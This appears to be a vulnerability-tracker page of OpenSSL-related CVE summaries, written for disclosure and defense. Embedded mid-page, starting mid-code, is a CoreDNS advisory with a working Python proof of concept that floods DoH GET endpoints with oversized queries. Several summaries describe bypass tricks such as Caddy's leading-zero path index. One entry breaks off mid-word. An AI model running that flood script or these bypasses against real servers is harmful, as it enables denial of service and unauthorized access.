OpenSSL

Insecure PRNG fallback in Crypt::ScryptKDF for Perl (versions through 0.010) exposes applications to cryptographically weak random byte generation when none of five recognized CSPRNG modules are installed. The `random_bytes` function silently degrades to Perl's built-in `rand()`, which is not a cryptographically secure source, potentially weakening scrypt-derived salts or keys in password hashing and key derivation workflows. No public exploit is identified and EPSS is 0.02% (4th percentile), but the cryptographic impact in minimally-configured Perl environments could be severe, as predictable salts dramatically reduce the cost of offline attacks against derived key material.

Authentication bypass in LizardByte Sunshine self-hosted game stream host (versions prior to 2026.516.143833) allows remote unauthenticated attackers to bypass client-certificate authentication and access protected HTTPS endpoints. The custom OpenSSL verification callback in src/crypto.cpp incorrectly treats several certificate validation errors as successful verification, enabling untrusted certificates to pass authentication. No public exploit identified at time of analysis, but the CVSS 9.8 rating reflects trivial network-based exploitation against default deployments.

Heap corruption in rust-openssl versions 0.10.50 through 0.10.79 allows attacker-controllable out-of-bounds writes of up to 7 bytes via the `CipherCtxRef::cipher_update_inplace` method when used with AES key-wrap-with-padding ciphers (EVP_aes_128_wrap_pad, EVP_aes_192_wrap_pad, EVP_aes_256_wrap_pad). The buffer sizing logic fails to account for AES-KWP's padding expansion when input length is not a multiple of 8, and because this occurs through FFI into native OpenSSL, Rust's memory safety guarantees do not prevent the corruption. This is a missed case from a prior fix for GHSA-xv59-967r-8726 in the same method; no public exploit has been identified at time of analysis.

Authorization bypass in Caddy's remote admin `/config` API (versions 2.4.0-2.11.2) allows a certificate-authenticated remote admin client restricted to a specific array-indexed config path (e.g., `/routes/0`) to read and modify sibling array elements (e.g., `routes[1]`) by requesting the path with a leading-zero index variant (`/routes/01`). The root cause is a semantic mismatch between two internal layers: the authorization layer performs string prefix matching (`strings.HasPrefix`), while the config traversal layer parses index components numerically via `strconv.Atoi()`, so `"01"` passes authorization as a prefix of `"0"` but resolves to integer index 1 during traversal. No public exploit is in CISA KEV, but a complete proof-of-concept with captured curl requests and server responses is publicly documented in the vendor GitHub advisory GHSA-x5w9-xh9r-mvfc.

Uncontrolled search path in Qt Network's OpenSSL TLS backend on Unix allows a high-privileged local attacker to inject a rogue CA certificate by placing a crafted certificate file in the application's working directory, causing Qt-based applications to treat it as a trusted system authority. Affected across multiple long-term support branches: Qt 5.x through 5.15.19, Qt 6.0-6.5.x through 6.5.9, Qt 6.6-6.8.x through 6.8.3, and Qt 6.9.x through 6.9.1 on Unix platforms. No public exploit identified at time of analysis, and CVSS 4.0 rates this at 1.8, reflecting substantial preconditions that severely limit real-world impact.

Heap memory exhaustion in the OpenTelemetry eBPF Instrumentation (OBI) Java agent affects all versions prior to 0.9.0 due to a memory leak in the custom CappedConcurrentHashMap used for TLS state tracking. Repeated TLS connection setup and teardown causes the internal ConcurrentLinkedQueue to grow without bound, because remove() purges keys from the backing ConcurrentHashMap but never from the queue, and the eviction logic only fires on put() when map.size() exceeds the cap. Under sustained TLS churn - a normal workload pattern for long-running instrumented services - this leads to progressive heap growth, extended GC pauses, and eventual OutOfMemoryError in the Java agent process. A proof-of-concept reproducer is publicly available, though no confirmed active exploitation (CISA KEV) has been identified at time of analysis.

Authentication bypass in the ruby-jwt gem (versions < 3.2.0) allows remote attackers to forge valid HS256/HS384/HS512 tokens when an application supplies an empty string or nil as the verification key. Because OpenSSL::HMAC.digest happily computes a digest under an empty key and JWT::JWA::Hmac coerces nil to '' without validating, any application whose key lookup degrades to '' (common with Redis misses, ORM string defaults, or `ENV['SECRET'] || ''` patterns) will accept attacker-signed tokens. No public exploit identified at time of analysis, but the vendor advisory (GHSA-c32j-vqhx-rx3x) and the v3.2.0 patch confirm the issue and the trivial forgery primitive.

Silent password truncation in the Perl module Crypt::OpenSSL::PKCS12 versions up to and including 1.94 causes any password bytes at or after the first embedded NULL byte to be dropped without warning. The flaw stems from password parameters being declared as char* in PKCS12.xs, routing through Perl's default typemap to SvPV_nolen and discarding the Perl-known length before C strlen() truncates the buffer. The result is severe entropy loss for binary, KDF-derived, or HMAC-derived passwords used to protect PKCS12 keystores, with no public exploit identified at time of analysis.

Heap out-of-bounds write in the Crypt::OpenSSL::PKCS12 Perl module (versions up to and including 1.94) allows attackers who can supply a malicious PKCS12 file processed via info() or info_as_hash() to corrupt heap memory and potentially achieve remote code execution. The flaw stems from an integer overflow when an OCTET STRING or BIT STRING attribute on a SAFEBAG is >= 1 GiB in size, causing an undersized allocation followed by an OOB write. No public exploit identified at time of analysis, but the upstream patch and oss-security disclosure are public.

Algorithm confusion in LibJWT 3.0.0 through 3.3.2 allows authentication bypass when RSA JWKs lack the 'alg' parameter. The OpenSSL backend incorrectly processes HMAC verification with a zero-length key when an RSA key without 'alg' is used to verify HS256/HS384/HS512 tokens, enabling attackers to forge valid JWTs without knowing any secret. Public exploit code exists (SSVC), making this a critical authentication bypass affecting applications using JWKS-based key lookup.

Local privilege escalation in Rapid7 Metasploit Pro allows unprivileged Windows users to achieve SYSTEM-level execution via OpenSSL configuration file hijacking. The metasploitPostgreSQL service loads openssl.cnf from a non-existent directory writable by standard users, enabling arbitrary command execution with SYSTEM privileges. Rated CVSS 8.5 (High) with proof-of-concept exploitation status (E:P). EPSS data not yet available. Not currently listed in CISA KEV catalog, suggesting vendor-disclosed rather than observed in-the-wild exploitation at time of analysis.

Arbitrary code execution in AMD optional tools occurs through DLL injection during unsafe OpenSSL initialization, allowing local authenticated attackers with low-privilege user access and user interaction to execute malicious code with high impact to confidentiality, integrity, and availability. The vulnerability stems from insecure library loading (CWE-427) where the affected AMD utilities fail to validate DLL search paths during OpenSSL library initialization. No active exploitation confirmed (not in CISA KEV) and no public exploit code identified at time of analysis, though the low attack complexity (AC:L) indicates straightforward exploitation once local access is obtained.

Unauthenticated remote code execution in Dalfox REST API server mode (versions ≤2.12.0) allows network attackers to execute arbitrary OS commands by injecting shell payloads via the `found-action` parameter in POST /scan requests. The server binds to 0.0.0.0:6664 by default with no API key enforcement unless explicitly configured, and deserializes attacker-controlled JSON directly into execution-control options without sanitization. Attackers trivially guarantee exploitation by hosting a reflective XSS endpoint to trigger the injected command. Fixed in version 2.13.0. CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H). EPSS data not available; no CISA KEV listing at time of analysis. Public exploit code exists (detailed proof-of-concept published in GitHub advisory GHSA-v25v-m36w-jp4h).

Heap buffer overflow in rust-openssl's AES key-wrap-with-padding cipher functions allows attackers to write up to 7 bytes past allocated buffer boundaries when processing non-multiple-of-8 plaintext inputs, enabling attacker-controlled heap corruption. Affected versions 0.10.0 through 0.10.78 are vulnerable when CipherCtxRef::cipher_update, CipherCtxRef::cipher_update_vec, or symm::Crypter::update are used with EVP_aes_128/192/256_wrap_pad ciphers.

Path traversal in Note Mark's asset upload feature allows authenticated users to inject directory traversal sequences into asset filenames via the X-Name HTTP header, which are stored unsanitized in the database. When an administrator subsequently runs data export CLI commands (typically as root in Docker deployments), the malicious filenames cause arbitrary file writes anywhere on the filesystem through Go's filepath.Join() path normalization. Attackers can achieve remote code execution as root by overwriting system binaries like /bin/bash or injecting cron jobs. Publicly available exploit code exists with video proof-of-concept demonstrating full RCE chain. Vendor-released patch available in version 0.19.4. CVSS 8.6 reflects network attack vector with low complexity but requires authenticated access and administrator interaction to trigger the export process.

ZTE Cloud PC client uSmartview contains an OpenSSL configuration file privilege escalation vulnerability (CVE-2026-40004) that allows authenticated local attackers with user-level privileges to execute arbitrary code and escalate to higher privilege levels through a malicious openssl.cnf file. This requires physical access or local system access combined with user interaction, and affects ZTE's virtualized desktop infrastructure product. The CVSS score of 5.5 reflects the physical attack vector and additional user interaction requirement, despite the severity of code execution and cross-system scope impact.

CSS Parser gem disables HTTPS certificate validation by setting OpenSSL::SSL::VERIFY_NONE, allowing man-in-the-middle attackers to inject or modify CSS content loaded via HTTPS. Any application using CSS Parser versions prior to 2.1.0 to fetch external stylesheets over HTTPS can be exploited by network-positioned attackers without authentication. A proof-of-concept using mitmproxy or Burp Suite demonstrates practical exploitation; CVSS 5.8 reflects the network attack vector and integrity impact, but real-world risk depends on whether the application loads stylesheets from untrusted or attacker-controllable URLs and whether the attacker can intercept network traffic.

Server-Side Request Forgery in Gotenberg's LibreOffice conversion endpoint allows remote attackers to make arbitrary HTTP requests from the server to internal networks and cloud metadata endpoints. Attackers upload specially crafted Office documents (DOCX, XLSX, PPTX) with embedded external URL references that LibreOffice fetches during PDF conversion, completely bypassing the SSRF protections introduced in v8.31.0. Publicly available exploit code exists with detailed proof-of-concept showing three successful HTTP requests to attacker-controlled servers. The vulnerability enables exfiltration of cloud IAM credentials from metadata services (169.254.169.254), internal service enumeration, and network reconnaissance without authentication. CVSS 8.2 with network vector and no privileges required reflects accurate real-world risk given documented exploitation method and lack of vendor-released patch.

Man-in-the-middle attacks can intercept LDAP credentials in Lemur when LDAP TLS is enabled because the authentication module globally disables TLS certificate verification using `ldap.OPT_X_TLS_NEVER`. Attackers positioned between Lemur and the LDAP server can capture plaintext usernames and passwords, modify LDAP group responses to grant admin access, and compromise the entire PKI infrastructure managed by Lemur. The vulnerability affects Lemur versions before 1.9.0 and is confirmed fixed in version 1.9.0.

Undefined behavior in rust-openssl's X509Ref::ocsp_responders allows crafted X.509 certificates with non-UTF-8 OCSP responder URLs to violate Rust's memory safety guarantees. Applications parsing untrusted certificates (TLS handshakes, certificate validation pipelines, PKI tooling) can trigger undefined behavior through safe Rust code when processing malformed AIA extensions. CVSS 8.7 reflects network-exploitable integrity impact; no active exploitation confirmed (not in CISA KEV), but patch available in version 0.10.79 per upstream GitHub advisory GHSA-xp3w-r5p5-63rr.

Denial of service in net-imap SCRAM-SHA1/SHA256 authentication allows a hostile IMAP server to freeze the entire Ruby VM by sending an arbitrarily large PBKDF2 iteration count, blocking all threads for several minutes due to the blocking nature of OpenSSL::KDF.pbkdf2_hmac and its retention of the Global VM Lock. Patched versions 0.4.24, 0.5.14, and 0.6.4 introduce a max_iterations parameter that users must explicitly configure to prevent exploitation.

Remote unauthenticated denial of service crashes Vanetza V2X v26.02 receivers via malformed GeoNetworking packets containing invalid ECC points. Uncaught OpenSSL exceptions from elliptic curve point validation (invalid compressed points, points not on curve) in the security layer escape through the Router::indicate() call chain, triggering std::terminate and process termination. No public exploit identified at time of analysis, though EPSS risk assessment unavailable. Attack requires only network access to the V2X receiver endpoint with no authentication or user interaction (CVSS AV:N/AC:L/PR:N/UI:N), making this a significant operational risk for deployed V2X infrastructure relying on continuous availability for vehicle safety communications.

{ values := req.URL.Query() b64, ok := values["dns"] if !ok { return nil, fmt.Errorf("no 'dns' query parameter found") } if len(b64) != 1 { return nil, fmt.Errorf("multiple 'dns' query values found") } return base64ToMsg(b64[0]) } func base64ToMsg(b64 string) (*dns.Msg, error) { buf, err := b64Enc.DecodeString(b64) if err != nil { return nil, err } m := new(dns.Msg) err = m.Unpack(buf) return m, err } ```` By contrast, the POST path applies a bounded read before unpacking: ```go func toMsg(r io.ReadCloser) (*dns.Msg, error) { buf, err := io.ReadAll(http.MaxBytesReader(nil, r, 65536)) if err != nil { return nil, err } m := new(dns.Msg) err = m.Unpack(buf) return m, err } ``` So, POST is explicitly size-bounded, while GET is not equivalently bounded before expensive parsing and decoding work occurs. In addition, the HTTPS server is created in `core/dnsserver/server_https.go:87-92` without an explicit early GET-path size guard in this path: ```go srv := &http.Server{ ReadTimeout: s.ReadTimeout, WriteTimeout: s.WriteTimeout, IdleTimeout: s.IdleTimeout, ErrorLog: stdlog.New(&loggerAdapter{}, "", 0), } ``` As a result, oversized DoH GET request targets are processed through: 1. HTTP request-line parsing 2. URL query parsing / unescaping 3. DoH GET extraction 4. base64 decoding 5. DNS message unpacking before the request is rejected. The root cause is missing early size validation on the DoH GET path. More specifically: * `requestToMsgGet()` performs `req.URL.Query()` on attacker-controlled oversized request targets. * The extracted `dns` value is passed to `base64ToMsg()` without an encoded-length or decoded-length bound. * `base64ToMsg()` fully decodes the attacker-controlled string before any DNS-size rejection. * The POST path already has an explicit bounded read, but GET does not have an equivalent pre-decode bound. This creates a pre-validation resource-amplification path for DoH GET. This was reproduced locally against CoreDNS 1.14.2 over HTTPS with `pprof` enabled. Create a self-signed certificate: ```bash openssl req -x509 -newkey rsa:2048 -sha256 -days 1 -nodes \ -keyout key.pem -out cert.pem \ -subj "/CN=127.0.0.1" ``` Create this `Corefile`: ```txt https://127.0.0.1:8443 { whoami log errors tls cert.pem key.pem pprof 127.0.0.1:6060 } ``` Run CoreDNS: ```bash ./coredns -conf Corefile ``` ```python #!/usr/bin/env python3 import argparse import base64 import collections import concurrent.futures import http.client import ssl import time def send_one(host, port, path, timeout): ctx = ssl._create_unverified_context() conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx) try: conn.request("GET", path, headers={ "Accept": "application/dns-message", "Connection": "close", }) resp = conn.getresponse() resp.read() return resp.status except Exception as e: return f"ERR:{type(e).__name__}" finally: try: conn.close() except Exception: pass def main(): ap = argparse.ArgumentParser() ap.add_argument("--host", default="127.0.0.1") ap.add_argument("--port", type=int, default=8443) ap.add_argument("--decoded-kib", type=int, default=720) ap.add_argument("--workers", type=int, default=64) ap.add_argument("--requests", type=int, default=5000) ap.add_argument("--timeout", type=float, default=5.0) args = ap.parse_args() raw = b"A" * (args.decoded_kib * 1024) b64 = base64.urlsafe_b64encode(raw).rstrip(b"=").decode() path = "/dns-query?dns=" + b64 print(f"[+] target = https://{args.host}:{args.port}") print(f"[+] decoded bytes = {len(raw):,}") print(f"[+] encoded chars = {len(b64):,}") print(f"[+] request-target length = {len(path):,}") print(f"[+] workers = {args.workers}, requests = {args.requests}") print("[+] 400 responses are expected; the issue is expensive processing before rejection.\n") started = time.time() results = collections.Counter() with concurrent.futures.ThreadPoolExecutor(max_workers=args.workers) as ex: futs = [ ex.submit(send_one, args.host, args.port, path, args.timeout) for _ in range(args.requests) ] for i, fut in enumerate(concurrent.futures.as_completed(futs), 1): results[fut.result()] += 1 if i % 10 == 0 or i == args.requests: print(f"[{i}/{args.requests}] {dict(results)}") elapsed = time.time() - started print("\n[+] done") print(f"[+] elapsed = {elapsed:.2f}s") print(f"[+] summary = {dict(results)}") if __name__ == "__main__": main() ``` Run the PoC: ```bash python3 poc_doh_get_oversize_https.py \ --host 127.0.0.1 \ --port 8443 \ --decoded-kib 720 \ --workers 64 \ --requests 5000 ``` CPU profile: ```bash (curl -s "http://127.0.0.1:6060/debug/pprof/profile?seconds=20" -o cpu_attack.pb.gz &) ; \ sleep 1 ; \ python3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000 ; \ wait go tool pprof -top ./coredns cpu_attack.pb.gz ``` Heap / allocation profiles: ```bash curl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_before.pb.gz curl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_before.pb.gz python3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000 curl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_after.pb.gz curl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_after.pb.gz go tool pprof -top -base heap_before.pb.gz ./coredns heap_after.pb.gz go tool pprof -top -base allocs_before.pb.gz ./coredns allocs_after.pb.gz ``` The issue was confirmed using the following: * CoreDNS 1.14.2 * linux/amd64 * go1.26.1 PoC payload characteristics: * decoded payload size: `737,280 bytes` * base64url-encoded `dns` length: `983,040` * request-target length: `983,055` Observed request outcome: * `5000 / 5000` requests returned `400 Bad Request` * total runtime for the 5000-request run: `18.22s` The important point is that the requests are rejected only after expensive processing has already happened. The CPU profile captured during the attack showed significant time in: * `net/http.readRequest` * `net/url.ParseQuery` / `net/url.QueryUnescape` / `net/url.unescape` * `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` * `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` * `encoding/base64.(*Encoding).DecodeString` * Go GC worker paths Representative cumulative values from the captured profile included: * `github.com/coredns/coredns/core/dnsserver.(*ServerHTTPS).ServeHTTP` → `10.91s` * `github.com/coredns/coredns/plugin/pkg/doh.RequestToMsg` → `10.88s` * `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` → `10.88s` * `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` → `3.50s` * `encoding/base64.(*Encoding).DecodeString` → `3.46s` * `net/http.readRequest` → `10.57s` * `net/url.(*URL).Query` / `ParseQuery` / `QueryUnescape` → `7.38s` * `runtime.gcBgMarkWorker` and related GC paths were also heavily active This demonstrates that the issue is not limited to final DNS unpacking. The oversized GET request forces meaningful work in HTTP parsing, URL handling, base64 decoding, and garbage collection before rejection. Allocation profiling showed very large transient allocation volume caused by the rejected requests: * total `alloc_space`: `26,756.48 MB` Top contributors included: * `net/textproto.(*Reader).readLineSlice` → `19,668.19 MB` * `net/textproto.(*Reader).ReadLine` → `3,738.84 MB` * `encoding/base64.(*Encoding).DecodeString` → `2,766.16 MB` Within the CoreDNS DoH GET path specifically: * `github.com/coredns/coredns/plugin/pkg/doh.RequestToMsg` → `2,775.67 MB` * `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` → `2,775.67 MB` * `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` → `2,773.67 MB` Heap delta (`inuse_space`) also showed live growth attributable to this path, including: * `encoding/base64.(*Encoding).DecodeString` → `7,629.75 kB` Runtime memory monitoring showed a clear increase in peak resident usage during the attack: * baseline `VmHWM / VmRSS` before load was approximately `55,864 kB` * observed `VmHWM` during testing reached approximately `146,100 kB` So even though requests returned `400`, the server still experienced substantial transient memory growth and allocator / GC pressure before rejection. A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to the HTTPS endpoint and force significant pre-rejection work. Impact includes: * elevated CPU consumption * large transient allocations * increased garbage-collection pressure * higher peak resident memory usage * degraded throughput and responsiveness * denial of service risk on memory-constrained or heavily loaded deployments This is especially relevant for internet-facing DoH deployments, where an attacker can repeatedly trigger the GET parsing path without authentication. The fact that the final HTTP status is `400 Bad Request` does not mitigate the issue, because the expensive processing has already occurred before the rejection is generated. A robust fix should address both stages of the problem: 1. Apply an early bound on the DoH GET request target / raw query length before expensive query parsing. 2. Enforce an encoded-length and decoded-length limit for the `dns` parameter before calling `DecodeString()`. 3. Preserve equivalent size constraints across GET and POST paths. A minimal hardening direction would be: * reject oversized GET requests before `req.URL.Query()` on the DoH path * reject `dns` values whose encoded length exceeds the maximum valid DNS message encoding * reject any decoded payload larger than the supported DNS message size before unpacking

Buffer overflow in rust-openssl 0.9.24 through 0.10.77 allows remote unauthenticated attackers to trigger memory corruption via crafted PSK (Pre-Shared Key) or cookie callback responses. The FFI trampolines in SslContextBuilder fail to validate closure-returned buffer sizes against allocated memory regions before passing values to OpenSSL, enabling out-of-bounds writes. Patch released in version 0.10.78. SSVC framework indicates no active exploitation detected, non-automatable attack requiring precise timing conditions (CVSS AT:P), with partial technical impact limited to confidentiality breach and minor availability disruption.

Memory corruption in rust-openssl's key derivation functions allows heap or stack buffer overflow when applications pass undersized buffers to Deriver::derive or PkeyCtxRef::derive on OpenSSL 1.1.x. The vulnerability affects X25519, X448, DH, and HKDF-extract operations where OpenSSL ignores the caller-specified buffer length and unconditionally writes the full shared secret, causing safe Rust code to trigger memory corruption. Vendor patch available in v0.10.78; OpenSSL 3.x deployments are not affected as newer providers correctly validate buffer lengths.

Buffer over-read in rust-openssl's password callback APIs allows information disclosure when a user-supplied callback returns a value larger than the provided buffer. The vulnerability affects rust-openssl bindings to OpenSSL 1.x and 2.x; OpenSSL 3.x implementations are not vulnerable. An attacker who controls the password callback can read sensitive data from adjacent memory regions.

Local privilege escalation in Rapid7 Insight Agent (versions > 4.1.0.2) on Windows allows unprivileged users to execute arbitrary code as SYSTEM via OpenSSL configuration file planting. The agent service loads openssl.cnf from a non-existent directory writable by standard users, enabling full host compromise without authentication. CVSS 8.5 with proof-of-concept exploit code available (E:P). EPSS data not provided; not currently listed in CISA KEV.

LDAP injection in maddy mail server versions before 0.9.3 allows remote unauthenticated attackers to extract sensitive directory attributes and spoof user identities. The auth.ldap module fails to escape user-supplied usernames before interpolating them into LDAP search filters and DN strings, despite having the ldap.EscapeFilter() function available. Attackers can exploit this via SMTP AUTH PLAIN or IMAP LOGIN interfaces to perform boolean-based blind injection attacks that extract password hashes, email addresses, group memberships, and other LDAP attributes character-by-character. While CVSS rates this 8.2 (High) for network-accessible unauthenticated exploitation with high confidentiality impact, no active exploitation (KEV) or weaponized POC has been identified at time of analysis. EPSS data not available for this recent CVE.

Local privilege escalation in KeePassXC password manager allows authenticated attackers with low privileges to execute arbitrary code by exploiting insecure OpenSSL configuration file loading. When a target user launches KeePassXC, malicious configuration planted in an unsecured path is loaded, enabling code execution in KeePassXC's security context. Attack requires user interaction and prior low-privileged access. CVSS 7.3 (AV:L/AC:L/PR:L/UI:R). No public exploit identified at time of analysis.

Certificate chain validation bypass in wolfSSL's OpenSSL compatibility layer allows authenticated network attackers to forge arbitrary certificates. Attackers possessing any legitimate leaf certificate from a trusted CA can craft fraudulent certificates for any subject name with arbitrary keys, bypassing signature verification when an untrusted CA:FALSE intermediate is inserted. Affects nginx and haproxy integrations using wolfSSL's OpenSSL compatibility API; native wolfSSL TLS handshake (ProcessPeerCerts) not vulnerable. No public exploit identified at time of analysis.

Authorization bypass in rfc3161-client's TimeStamp Authority (TSA) verification allows remote attackers to impersonate any trusted TSA by exploiting a naive leaf certificate selection algorithm in the PKCS#7 certificate chain. The vulnerability enables an attacker to inject a forged certificate with a target TSA's common name and timeStamping EKU into an authentic timestamp response, causing the library to validate authorization checks against the fake certificate while the cryptographic signatu

Issue summary: Converting an excessively large OCTET STRING value to a hexadecimal string leads to a heap buffer overflow on 32 bit platforms. Impact summary: A heap buffer overflow may lead to a crash or possibly an attacker controlled code execution or other undefined behavior. If an attacker can supply a crafted X.509 certificate with an excessively large OCTET STRING value in extensions such as the Subject Key Identifier (SKID) or Authority Key Identifier (AKID) which are being converted to hex, the size of the buffer needed for the result is calculated as multiplication of the input length by 3. On 32 bit platforms, this multiplication may overflow resulting in the allocation of a smaller buffer and a heap buffer overflow. Applications and services that print or log contents of untrusted X.509 certificates are vulnerable to this issue. As the certificates would have to have sizes of over 1 Gigabyte, printing or logging such certificates is a fairly unlikely operation and only 32 bit platforms are affected, this issue was assigned Low severity. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.

NULL pointer dereference in OpenSSL CMS EnvelopedData processing enables unauthenticated remote denial of service. Affects OpenSSL 1.0.2 through 3.6.x when processing attacker-controlled CMS messages with KeyTransportRecipientInfo using RSA-OAEP encryption. Missing optional parameters field in algorithm identifier triggers crash before authentication occurs. Applications calling CMS_decrypt() on untrusted input (S/MIME, CMS-based protocols) vulnerable. FIPS modules unaffected. No public exploit identified at time of analysis. EPSS indicates low observed exploitation activity.

Null pointer dereference in OpenSSL 1.0.2 through 3.6 CMS EnvelopedData processing crashes applications before authentication when KeyAgreeRecipientInfo messages lack optional parameters field. Unauthenticated remote attackers can trigger denial of service against S/MIME processors and CMS-based protocol handlers calling CMS_decrypt() on untrusted input. FIPS modules unaffected. Vendor-released patches available for all affected branches (1.0.2zp, 1.1.1zg, 3.0.20, 3.3.7, 3.4.5, 3.5.6, 3.6.2). Low observed exploitation activity; no public exploit identified at time of analysis.

NULL pointer dereference in OpenSSL 1.0.2 through 3.6.x delta CRL processing enables remote denial-of-service attacks against applications performing X.509 certificate verification. Exploitation requires X509_V_FLAG_USE_DELTAS flag enabled, certificates with freshestCRL extension or base CRL with EXFLAG_FRESHEST flag, and attacker-supplied malformed delta CRL missing required CRL Number extension. Unauthenticated network-accessible attack with low complexity causes application crash. Impact limited to availability; memory disclosure and code execution ruled out by vendor. FIPS modules unaffected.

Out-of-bounds read in OpenSSL 3.6.0-3.6.1 allows denial of service when AES-CFB128 encryption or decryption processes partial cipher blocks on x86-64 systems with AVX-512 and VAES support. Vulnerability triggers when input buffer ends at a memory page boundary with subsequent unmapped page, causing crashes. Exploitation requires unauthenticated network access but demands specific architectural conditions (AVX-512/VAES) and partial block handling. No public exploit identified at time of analysis. EPSS percentile 5% indicates low observed exploitation activity.

Weak pseudo-random number generation in Cloudreve enables JWT forgery and complete account takeover on instances initialized before v4.10.0. Attackers can brute-force the PRNG seed (achievable in under 3 hours on consumer hardware) by obtaining administrator creation timestamps via public APIs and validating against known hashids, then forge valid JWTs for any user including administrators. No public exploit confirmed at time of analysis, though detailed attack methodology is disclosed. CVSS 8.1 (High) reflects network-accessible privilege escalation despite high attack complexity requiring cryptographic brute-forcing.

Local privilege escalation via hardcoded build path in vcpkg's OpenSSL binaries affects Windows users of the C/C++ package manager prior to version 3.6.1#3. The vulnerability allows authenticated local attackers with low privileges to achieve high confidentiality, integrity, and availability impact (CVSS 7.8) by exploiting the hardcoded openssldir path that references the original build machine. Upstream fix available (PR #50518, commit 5111afd); patched version 3.6.1#3 released. No public exploit identified at time of analysis, with EPSS data not available for this recent CVE.

The node-forge npm library fails to enforce RFC 5280 basicConstraints validation in its verifyCertificateChain() function, allowing any leaf certificate without basicConstraints and keyUsage extensions to sign other certificates that node-forge accepts as valid. Attackers holding any valid leaf certificate (e.g., a standard TLS certificate) lacking these extensions can forge certificates for arbitrary domains, bypassing certificate chain validation in applications using node-forge for custom PKI implementations, S/MIME verification, or IoT device authentication. A complete proof-of-concept exploit is publicly available demonstrating successful chain verification bypass. CVSS score of 7.4 reflects network-accessible attack vector with high complexity but no authentication required.

The digitalbazaar/forge npm package accepts forged Ed25519 signatures due to missing scalar canonicalization checks, allowing authentication and authorization bypass in applications that rely on signature uniqueness. All versions since Ed25519 implementation are affected (confirmed through version 1.3.3), identified as pkg:npm/node-forge. Publicly available exploit code exists with a complete proof-of-concept demonstrating how attackers can create multiple valid signatures for the same message by adding the group order L to the scalar component S, bypassing deduplication, replay protection, and signed-object canonicalization checks. The vendor has released a patch via commit bdecf11571c9f1a487cc0fe72fe78ff6dfa96b85.

Signature forgery in node-forge npm package (all versions through v1.3.3) allows remote attackers to bypass RSASSA PKCS#1 v1.5 signature verification for RSA keys using low public exponent (e=3). Attackers can construct Bleichenbacher-style forged signatures by injecting malicious ASN.1 content within DigestInfo structures and exploiting missing padding length validation, enabling authentication bypass in systems relying on forge for cryptographic verification. Proof-of-concept code demonstrates successful forgery against forge while OpenSSL correctly rejects the same signature. CVSS score 7.5 (High) with network attack vector, low complexity, and no privileges required. No public exploit identified at time of analysis beyond the research POC.

Modoboa, an open-source mail server management platform, contains a command injection vulnerability in its subprocess execution handler that allows authenticated Reseller or SuperAdmin users to execute arbitrary operating system commands. A proof-of-concept exploit exists demonstrating how shell metacharacters in domain names can achieve code execution, typically as root in standard deployments. The vulnerability affects modoboa versions up to and including 2.7.0, with patches available in version 2.7.1.

Ory Keto, an open-source authorization service, contains a SQL injection vulnerability in its GetRelationships API due to insecure pagination token handling. Attackers who know or can exploit the default hard-coded pagination encryption secret can craft malicious tokens to execute arbitrary SQL queries. The CVSS score of 7.2 reflects high privileges required (PR:H), though the actual risk is elevated when default secrets remain unchanged in production deployments.

Ory Hydra, an OAuth 2.0 and OpenID Connect provider, contains a SQL injection vulnerability in three admin APIs (listOAuth2Clients, listOAuth2ConsentSessions, listTrustedOAuth2JwtGrantIssuers) due to insecure pagination token handling. Attackers who know the pagination secret can craft malicious encrypted tokens to execute arbitrary SQL queries. The CVSS score of 7.2 requires high privileges (PR:H), but successful exploitation grants full database access with high confidentiality, integrity, and availability impact.

Ory Kratos, an open-source identity and user management system, contains a SQL injection vulnerability in its ListCourierMessages Admin API through malicious pagination tokens. Attackers who know or can exploit the default pagination encryption secret can craft tokens to execute arbitrary SQL queries against the backend database. The vulnerability requires high privileges (PR:H) but is network-exploitable (AV:N) with low complexity (AC:L), scoring CVSS 7.2.

Buffer overflow in pyOpenSSL's cookie generation callback allows attackers to corrupt memory and potentially achieve remote code execution by supplying oversized cookie values exceeding 256 bytes. The vulnerability affects applications using custom cookie callbacks with OpenSSL integration, where insufficient length validation permits writing beyond allocated buffer boundaries. A patch is available that implements proper cookie size validation.

OpenSSL and Microsoft products using the 'DEFAULT' keyword in TLS 1.3 key exchange group configurations may negotiate weaker cryptographic groups than intended, allowing network-based attackers to potentially downgrade the security of encrypted connections without authentication or user interaction. This affects servers that combine default group lists with custom configurations, particularly impacting hybrid post-quantum key exchange implementations where clients defer group selection. A patch is available to remediate this high-severity confidentiality risk.

Remote code execution in XWEB Pro firmware versions 1.12.1 and earlier allows authenticated attackers to execute arbitrary commands by injecting malicious input into OpenSSL parameter fields. An attacker with valid credentials can exploit this command injection vulnerability through the utility route to gain complete system compromise. No patch is currently available for affected XWEB 500b Pro and 300d Pro devices.

The Linux kernel's virtio-crypto driver lacks proper synchronization when handling virtqueue notifications from multiple processes, causing data corruption and system hangs when processing cryptographic operations concurrently. Local attackers with user privileges can trigger denial of service by running parallel crypto workloads, as demonstrated through multi-process OpenSSL benchmarks that expose race conditions in the virtcrypto_done_task() handler. No patch is currently available for this medium-severity vulnerability affecting systems running virtio-crypto with builtin backends.

Unauthenticated arbitrary file upload in WPvivid Backup & Migration WordPress plugin. EPSS 0.44%.

Adminer versions 5.4.1 and earlier suffer from a post-message validation bypass that allows remote attackers to trigger denial of service affecting all users. By sending a crafted POST request with array parameters to the version endpoint, an attacker can cause openssl_verify() to receive malformed input, resulting in a TypeError that crashes the application and returns HTTP 500 errors. Public exploit code exists for this vulnerability; administrators should upgrade to version 5.4.2 immediately.

